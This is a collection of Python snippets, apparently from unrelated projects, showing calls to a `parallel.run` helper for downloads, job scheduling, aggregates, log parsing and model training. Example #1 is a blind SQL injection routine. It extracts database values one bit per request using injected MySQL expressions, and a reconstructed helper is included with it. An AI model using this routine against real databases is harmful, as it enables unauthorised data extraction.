Example #1
import sys

def get_string(template, val, func):
    # val: 'version()'
    # get length
    ltemp = 'mid(lpad(bin(length(%s)), 8, "0"), %d, 1) = %s'
    length = binary_search(func, template % ltemp, val,
                           8)  # content length limit: 2^8
    print('length: %d' % length)

    wtemp = 'mid(lpad(bin(ascii(mid(%s, {0}, 1))), 8, "0"), %d, 1) = %s'
    print('\r' + '_' * length, end='')
    output = dict()

    def _(obj):
        (i, j) = obj  # i == j here: enumerate(range(length)) yields equal pairs
        _ascii = binary_search(func, template % wtemp.format(j + 1), val, 8)
        output[i] = chr(_ascii)
        print('\r' + ''.join(output.get(_i, '_') for _i in range(length)),
              end='')
        sys.stdout.flush()

    parallel.run(_,
                 enumerate(range(length)),
                 thread_num=max(1, min(THREAD_N, length // 2)))
    print()
    return ''.join(output.get(_i, '_') for _i in range(length))
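This snippet drives a blind SQL injection: both payload templates test one bit at a time of an 8-bit value, so the project's `binary_search` helper (not shown here) most likely probes each bit with one request. A minimal sketch of such a helper, reconstructed from the call sites above; the body and the quoting of the bit literal are assumptions, not the project's actual code:

def binary_search(func, payload, val, bits):
    # `payload` still contains three placeholders: the probed SQL
    # expression (%s), a 1-based bit index (%d) and the expected bit
    # character (%s). `func` sends the injected query and returns True
    # when the condition holds, so recovering the value costs `bits`
    # requests, most significant bit first.
    result = 0
    for i in range(1, bits + 1):
        bit = 1 if func(payload % (val, i, "'1'")) else 0
        result = (result << 1) | bit
    return result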
Example #2
    def _update_file(self):
        # Check and set the flag under the lock so two concurrent calls
        # cannot both start an update.
        with self._update_lock:
            if self._updating:
                return
            self._updating = True

        def download_and_compare():
            new_file_name = self.get_file_path() + '.new'

            try:
                ash.get_review_into_file(
                    self._review.get_id(),
                    self._name_in_review,
                    new_file_name,
                )

                self._review._diff_with_remote(
                    self.get_file_path(),
                    new_file_name,
                )
            finally:
                with self._update_lock:
                    self._updating = False

        parallel.run(download_and_compare)
Example #3
    def _download_file(self):
        parallel.run(lambda: ash.get_review_into_file(
            self._review.get_id(),
            self._name_in_review,
            self.get_file_path(),
        ))
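Examples 2 and 3 call `parallel.run` with a single zero-argument callable, i.e. a fire-and-forget background task. The project's `parallel` module is not shown; a minimal sketch of what such a helper could look like (an assumption, not the actual implementation):

import threading

def run(func):
    # Fire-and-forget: run `func` on a daemon thread so the caller is
    # not blocked by the download/diff round-trip.
    thread = threading.Thread(target=func)
    thread.daemon = True
    thread.start()
    return thread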
Example #4
def run_jobs(jobs, args, key):
    jobs = [tuple(map(str, job)) for job in jobs]
    if config.SCHEDULER == 'parallel':
        machines = parallel.parse_machines(args.machines, args.njobs)
        parallel.run('experiments.py', jobs, machines=machines, key=key)
    elif config.SCHEDULER == 'single_process':
        single_process.run('experiments.py', jobs)
    else:
        raise RuntimeError('Unknown scheduler: %s' % config.SCHEDULER)
Example #6
def avg(data, column):
    global __is_aggregate
    __is_aggregate = True
    vals = [row[column] for row in data]
    data = parallel.run(
        parallel.map(lambda chunk: [(sum(int(line) for line in chunk), len(chunk))]),
        vals,
        'avg()'
    )
    dividend = parallel.run(parallel.reduce(lambda data: sum((d[0] for d in data), 0.0)), data)
    divisor = parallel.run(parallel.reduce(lambda data: sum(d[1] for d in data)), data)
    return sum(dividend) / sum(divisor)
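The (sum, count) pairs are what make the average parallelizable: each chunk contributes a partial sum and its length, and the division happens only once at the end. A single-process equivalent for reference (avg_serial and the chunking scheme are hypothetical, not part of the project):

def avg_serial(vals, chunks=4):
    # Each chunk is reduced to a (partial_sum, count) pair; the average
    # is total_sum / total_count, independent of how vals was split.
    pairs = [(sum(int(v) for v in chunk), len(chunk))
             for chunk in (vals[i::chunks] for i in range(chunks))]
    return sum(p[0] for p in pairs) / sum(p[1] for p in pairs)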
Example #7
def _where(where, data):
    """
    Compile `where` ast into executable code and run 
    a parallel 'filter' on the data with it
    """
    if where is None:
        return
    ast.fix_missing_locations(where)
    return parallel.run(__where, data, "<where clause>", syntree=where)
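The `__where` worker itself is not shown; the pattern suggested by `ast.fix_missing_locations` and the "<where clause>" filename is to compile the expression AST once, then evaluate it per row. A standalone illustration of that compile/eval step (the expression and row layout are invented for the example):

import ast

tree = ast.parse("int(row[2]) > 10", mode="eval")
ast.fix_missing_locations(tree)
code = compile(tree, "<where clause>", "eval")

rows = [["a", "b", "42"], ["c", "d", "7"]]
filtered = [row for row in rows if eval(code, {}, {"row": row})]
# filtered == [["a", "b", "42"]]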
Example #8
    def crunchlogs(self):
        global log_regex
        # Pick the format string either from --format or from the
        # predefined table in the logformat module; the local name must
        # differ from `logformat` so the module is not shadowed.
        if self.args.format is not None:
            fmt = self.args.format
        else:
            fmt = logformat.TYPES[self.args.type]

        print()
        lines = []
        for logfile in self.args.logfile:
            screen.print_mutable("Reading lines from %s:" % logfile.name)
            lines += logfile.readlines()
            screen.print_mutable("Reading lines from %s: %d" % (logfile.name, len(lines)))
            logfile.close()
            screen.print_mutable("", True)

        log_regex = re.compile(parse_format_string(fmt))
        if self.args.lines:
            lines = lines[:self.args.lines]
        st = time.time()
        self.data = parallel.run(log_match, lines, _print=True)
        et = time.time()
        print "%d lines crunched in %0.3f seconds" % (len(lines), (et-st))
Example #9
                    help="eval mode only")
parser.add_argument("--retrain",
                    default=False,
                    action="store_true",
                    help="force retrain")
args = parser.parse_args()

commands = []

# all targets
targets = ["movement", "movement_up", "anomaly", "future_anomaly", "positive"]

# iterate over all folders
for folder in os.listdir("logs/"):
    for target in targets:
        commands.append('python -O classify.py "%s" --target %s' %
                        (os.path.join("logs", folder), target))

if args.eval:
    commands = [cmd + " --nobalance" for cmd in commands]

if args.retrain:
    commands = [cmd + " --retrain" for cmd in commands]

# all the commands to run
print("Going to run following commands (%d):" % (len(commands)))
for command in commands:
    print("-", command)

parallel.run(commands, num=4)
Example #10
loss = [
    "InfoNCE",
    "VAE",
    "BCE-Movement",
    "BCE-Up-Movement",
    "BCE-Anomaly",
    "BCE-Future-Anomaly",
]
bars = ["time", "volume", "dollars"]

commands = []

# we do 1000 epochs each
num_epochs = 1000

for a in bars:
    for b in loss:
        commands.append(
            "python -O train.py --validate --bar_type %s --loss %s --num_epochs %d"
            % (a, b, num_epochs)
        )

# all the commands to run
print("Going to run following commands (%d):" % (len(commands)))
for command in commands:
    print("-", command)

# run all commands
parallel.run(commands)
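Examples 9 and 10 pass a list of shell commands and, optionally, a worker count. Only the call signature comes from the examples; a standard-library sketch of such a command runner could be:

import subprocess
from concurrent.futures import ThreadPoolExecutor

def run(commands, num=None):
    # Execute each command in its own subprocess, keeping at most `num`
    # alive at a time; exit codes are returned in input order.
    with ThreadPoolExecutor(max_workers=num or max(1, len(commands))) as pool:
        return list(pool.map(lambda cmd: subprocess.call(cmd, shell=True),
                             commands))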
Example #11
def imageToRGB(width, height, full_data):
    return parallel.run(p_imageToColorLine, range(0, height),
                        [specToRGB, width, full_data], verbose=VERBOSE_LEVEL)
Example #12
def imageToEnergy(width, height, full_data):
    return parallel.run(p_imageToGrayLine, range(0, height),
                        [specToEnergy, width, full_data], verbose=VERBOSE_LEVEL)
Example #13
trials = [
        # (lambda x: x+2, 1),
        # (lambda x, y: x+y, 1),
        # (lambda x, y: x-y, 1),
        # (lambda x, y: x*y, 1),
        (lambda x, y: x/y, 1),
        # (lambda x, y, z: x * (y + z), 2),
        # (lambda w, x, y, z: (w + x) / (y - z), 3),
        # (lambda x, y, z: x / (y + z), 2),
        # (lambda w, x, y, z: (w + x) * (y + z), 3),
        # (lambda w, x, y, z: w + x*(2.0 + y*z), 4),
        # (lambda I, M, m, l, b: -(I+m*l*l)*b / (I*(M+m) + M*m*l*l), 10),
        # (lambda x: 6.0*x, 1)
]

# models = [
#         mlp,
#         pnet_lambda(SCALE)
# ]

models = [pnet_lambda(lamb) for lamb in (100,)]  # (100, 1000, 10000)

for fn, steps in trials:
    X, y = util.generate_data(fn, DATASIZE, scale=SCALE)  # , noise=np.random.randn
    # pnet(fn, X, y, steps)
    all_losses = parallel.run(models, args=(fn, X, y, steps))
    # for losses in all_losses:
    #     plt.plot(losses)
    # plt.legend(['Standard MLP', 'Processor network'])
    # plt.show()
Example #14
def min(data, column):
    global __is_aggregate
    __is_aggregate = True
    # This function shadows the built-in min, so fetch the real one via
    # the builtins module (more robust than indexing __builtins__).
    import builtins
    _min = builtins.min
    vals = [row[column] for row in data]
    # The global minimum is the minimum of the per-chunk minimums.
    return _min(parallel.run(parallel.reduce(lambda chunk: _min(int(i) for i in chunk)), vals))
Example #15
import basic
import basic2
import nested
import inheritance
import complex_types
import libuse
import parallel

from autolog import Autolog

autolog = Autolog(
    [basic, basic2, nested, inheritance, complex_types, libuse, parallel])
autolog.run()  # by running this function, logging is activated

complex_types.run()
libuse.run()
basic.run()
basic2.run()
nested.run()
inheritance.run()
parallel.run()